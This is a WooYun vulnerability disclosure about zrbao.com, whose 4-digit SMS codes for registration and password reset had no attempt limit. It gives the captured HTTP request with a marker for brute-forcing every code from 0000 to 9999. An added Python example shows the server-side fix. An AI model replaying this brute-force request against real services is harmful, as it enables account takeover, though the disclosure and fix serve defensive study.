WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops articles online--------http://drop.zone.ci/
2015-11-30: Details have been sent to the vendor and are awaiting the vendor's handling
2015-12-02: The vendor has confirmed; details are disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and experts in related fields
2015-12-22: Details disclosed to ordinary white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public
There isn't a single vulnerability in the vulnerability list yet, so give the first one 20 RANK.
The phone verification code used for registration and password reset is 4 digits long, and there is no limit on the number of attempts. Verification code:
Enter any verification code and capture the request on submit; then iterate the code over 0000-9999:
POST /User/phoneReg.shtml HTTP/1.1
Host: www.zrbao.com
User-Agent: rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.zrbao.com/reg.shtml
Content-Length: 221
Cookie: JSESSIONID=92A2B6CDE6365F56B2AC5EF383E8BAD6-n1; Hm_lvt_b4e112a89209d15dd495141817984363=1448863648; Hm_lpvt_b4e112a89209d15dd495141817984363=1448863666
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

jsonDataSet=%7B%22phone%22%3A%2213333333333%22%2C%22imgCode%22%3A%22afdq%22%2C%22phoneCode%22%3A%22§9999§%22%2C%22pwd%22%3A%22********%22%2C%22recommendUid%22%3A%22%22%2C%22isCheck%22%3Atrue%2C%22logType%22%3A%22web%22%7D
Registration succeeded.
Login:
The same applies to the forgot-password function:
You know the rest.
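The root cause above is a 4-digit code that the server will check as many times as the client likes. The following is an added illustration of the server-side fix, not code from the report or from the vendor: a code store that caps wrong guesses per issued code, expires codes, burns a code once it is used, and compares in constant time. The phone number is the one from the captured request; the class and parameter names are hypothetical.

```python
import hmac
import secrets
import time

CODE_LENGTH = 6          # 4 digits leave only 10,000 possibilities; 6 digits give 1,000,000
MAX_ATTEMPTS = 5         # wrong guesses allowed per issued code before it is burned
CODE_TTL_SECONDS = 300   # a code is only valid for five minutes


def brute_force_success_probability(code_length, attempts_allowed):
    """Chance that an attacker guesses a random numeric code within the allowed attempts."""
    return min(1.0, attempts_allowed / 10 ** code_length)


class PhoneCodeStore:
    """In-memory store of one-time SMS codes keyed by phone number (demo; use Redis or
    similar in production so every app node sees the same attempt counter)."""

    def __init__(self, now=time.time):
        self._now = now
        self._codes = {}  # phone -> {"code": str, "expires": float, "attempts": int}

    def issue(self, phone):
        # Issuing should itself be rate limited per phone; omitted here for brevity.
        code = "".join(secrets.choice("0123456789") for _ in range(CODE_LENGTH))
        self._codes[phone] = {"code": code, "expires": self._now() + CODE_TTL_SECONDS, "attempts": 0}
        return code

    def verify(self, phone, submitted):
        entry = self._codes.get(phone)
        if entry is None:
            return "no_code"
        if self._now() > entry["expires"]:
            del self._codes[phone]
            return "expired"
        if entry["attempts"] >= MAX_ATTEMPTS:
            return "locked"  # even a correct guess is rejected now; the user must request a new code
        entry["attempts"] += 1
        if hmac.compare_digest(entry["code"], str(submitted)):
            del self._codes[phone]  # one-time: a used code cannot be replayed
            return "ok"
        return "wrong"
```

With a 4-digit code and unlimited attempts the attacker's success probability is 1.0; with the settings above it is 5e-06 per issued code.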
Severity: Medium
Vulnerability Rank: 6
Confirmation time: 2015-12-02 11:39
The SMS service has already been split out; the internal restrictions are not exposed.
None for now.